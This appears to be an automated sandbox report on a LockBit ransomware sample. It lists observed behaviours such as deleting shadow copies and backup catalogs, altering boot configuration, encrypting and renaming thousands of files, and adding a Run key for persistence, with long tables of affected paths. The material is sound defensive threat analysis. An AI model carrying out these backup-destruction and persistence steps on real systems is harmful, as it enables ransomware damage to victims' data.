Analysis Overview
SHA256
63b9637406042b4a9ab162e581c935e7f2c20b64ca504c4ae4e947aa43565b52
Threat Level: Known bad
The file ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.7z was found to be: Known bad.
Malicious Activity Summary
Lockbit
Renames multiple (6432) files with added filename extension
Modifies boot configuration data using bcdedit
Deletes shadow copies
Renames multiple (7488) files with added filename extension
Deletes System State backups
Deletes backup catalog
Checks computer location settings
Deletes itself
Enumerates connected drives
Adds Run key to start application
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Volume Shadow Copy service COM API
Runs ping.exe
Suspicious use of WriteProcessMemory
Interacts with shadow copies
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-02-15 03:42
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-15 03:42
Reported
2024-02-15 04:08
Platform
win7-20231215-en
Max time kernel
838s
Max time network
840s
Command Line
Signatures
Lockbit
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Renames multiple (7488) files with added filename extension
Deletes System State backups
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Software\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\"" | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\FlickAnimation.avi | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\chkrzm.exe.mui | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341645.JPG | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK_K_COL.HXK | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_F_COL.HXK | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099174.WMF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152696.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105414.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Waveform.thmx | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Templates\1033\EssentialMergeLetter.dotx | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH00780U.BMP.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\Welcome.html | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\ja-JP\settings.html | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Aqtau.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0215710.WMF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00221_.WMF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR28F.GIF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\es-ES\currency.html | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00468_.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18241_.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Multiplayer\Checkers\it-IT\chkrzm.exe.mui.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0086426.WMF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\fr-FR\Mahjong.exe.mui | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\INDUST.INF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01170_.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Etc\GMT+12.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00601_.WMF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Canary | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Elemental.thmx | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\PROOF\MSWDS_FR.LEX.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePage.html.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SlateBlue.css.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Help\NamedURLs.HxK | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107288.WMF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\utilityfunctions.js | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216153.JPG.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\Restore-My-Files.txt | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02218_.GIF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\SyncConfirm.dib.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0304875.WMF.abcd | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | C:\Windows\system32\wbadmin.exe | N/A |
| File opened for modification | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | C:\Windows\system32\wbadmin.exe | N/A |
Enumerates physical storage devices
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ec88f821d22e5553afb94b4834f91ecdedeb27d9ebfd882a7d8f33b5f12ac38d.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
